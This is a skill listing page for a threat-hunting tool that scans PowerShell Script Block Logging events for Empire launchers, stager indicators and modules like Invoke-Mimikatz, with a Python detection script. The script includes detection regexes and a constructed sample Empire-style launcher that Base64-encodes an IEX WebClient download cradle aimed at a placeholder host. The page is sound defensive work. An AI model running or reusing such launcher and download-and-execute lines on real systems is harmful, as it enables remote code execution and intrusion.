analyzing-powershell-empire-artifacts
Community skill: Detect Empire artifacts in PowerShell logs
Category: Data & Analytics
Tags: powershell, threat-hunting, empire, script-block-logging, module-logging, base64-decoding, ioc-detection
Author: Axxxxxxaaann
Version: 1.0.0
Installs: 0
System Documentation
What problem does it solve?
Artifacts of PowerShell Empire activity are easy to miss in Windows event logs, which slows down the identification of compromised systems. This Skill provides a structured approach to detecting Empire launcher patterns, stager IOCs, module signatures, staging URIs, and default user agents in Script Block Logging events, so that containment and response can start sooner.
Core Features & Use Cases
- Detects the default Empire launcher pattern in PowerShell Script Block Logging (Event ID 4104) and decodes embedded Base64 payloads for analysis.
- Identifies Empire stager indicators such as System.Net.WebClient usage, FromBase64String decoding, and common IEX/Invoke-Expression execution patterns.
- Flags Empire module signatures (e.g., Invoke-Mimikatz, Invoke-Kerberoast) along with default staging URIs and user agents to support threat-hunting workflows.
- Produces a structured report mapping detections to MITRE ATT&CK techniques and facilitating incident response.
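The feature list above describes a scan of Event ID 4104 records: find the launcher, decode the embedded Base64 (PowerShell's -EncodedCommand payload is UTF-16LE), then match stager and module indicators and map each hit to an ATT&CK technique. The following is an added illustration written for this page, not the Skill's own agent script. Assumptions: the sample events are constructed, the ATT&CK mapping is my own choice, and the launcher regex reflects the switch sequence commonly cited in public detection rules for the default Empire launcher, which you should confirm against launchers captured in your own environment.

```python
import base64
import binascii
import re

# Indicators named in the skill description, each paired with an ATT&CK technique.
# The technique mapping is my own choice for illustration; align it with your playbook.
INDICATORS = [
    (re.compile(r"System\.Net\.WebClient", re.I), "stager: WebClient download cradle", "T1105"),
    (re.compile(r"FromBase64String", re.I), "stager: inline Base64 decoding", "T1027"),
    (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), "stager: dynamic code execution", "T1059.001"),
    (re.compile(r"Invoke-Mimikatz", re.I), "module: credential dumping", "T1003"),
    (re.compile(r"Invoke-Kerberoast", re.I), "module: Kerberoasting", "T1558.003"),
]

# Switch sequence commonly cited in public detection rules for the default Empire
# launcher. Assumption: verify it against launchers seen in your environment.
LAUNCHER_RE = re.compile(r"-NoP\s+-sta\s+-w\s+1\s+-enc\b", re.I)

# Any -EncodedCommand switch variant followed by a Base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if absent or malformed."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None  # malformed blob: worth logging, but it must not abort the scan
    return raw.decode("utf-16-le", errors="replace")


def scan_script_block(event):
    """Scan one Event ID 4104 record; return a finding dict, or None if nothing matched."""
    text = event.get("ScriptBlockText", "")
    decoded = decode_encoded_command(text)
    # Match indicators against both the raw block and the decoded payload.
    haystack = text + ("\n" + decoded if decoded else "")
    hits = [(desc, tech) for rx, desc, tech in INDICATORS if rx.search(haystack)]
    launcher = bool(LAUNCHER_RE.search(text))
    if not hits and not launcher:
        return None
    if launcher:
        hits.insert(0, ("launcher: default Empire switch sequence", "T1059.001"))
    return {
        "computer": event.get("Computer"),
        "event_id": event.get("EventID"),
        "launcher": launcher,
        "decoded_payload": decoded,
        "indicators": [d for d, _ in hits],
        "techniques": sorted({t for _, t in hits}),
    }


def build_report(events):
    """Scan a sequence of 4104 events and keep only those with findings."""
    return [f for f in (scan_script_block(e) for e in events) if f]


# Constructed sample records (not real telemetry). The encoded payload is a
# WebClient/IEX cradle that points at a reserved .invalid hostname.
_PAYLOAD = "IEX (New-Object System.Net.WebClient).DownloadString('http://stager.example.invalid/')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText": f"powershell -NoP -sta -w 1 -enc {_ENC}"},
    {"EventID": 4104, "Computer": "WS02", "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"EventID": 4104, "Computer": "WS03", "ScriptBlockText": "Invoke-Kerberoast"},
]

if __name__ == "__main__":
    for finding in build_report(SAMPLE_EVENTS):
        print(finding["computer"], finding["techniques"], finding["indicators"])
```

Staging URIs and user agents are deliberately absent from INDICATORS because this page does not list their values; add them as further regex rows once you have them from your own Empire samples. Feeding real data means exporting the 4104 events (for example with Get-WinEvent on the Microsoft-Windows-PowerShell/Operational log) into the dict shape used above.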
Quick Start
Run the agent script to scan Windows PowerShell event logs for Empire artifacts and generate findings.
Dependency Matrix
Required Modules: none required
Components: scripts, references
💻 Claude Code Installation
Recommended: let Claude install automatically. Copy and paste the text below into Claude Code.
Please help me install this Skill:
Name: analyzing-powershell-empire-artifacts
Download link: https://github.com/Axxxxxxaaann/KAIRI-Skills/archive/main.zip#analyzing-powershell-empire-artifacts
Please download this .zip file, extract it, and install it in the .claude/skills/ directory.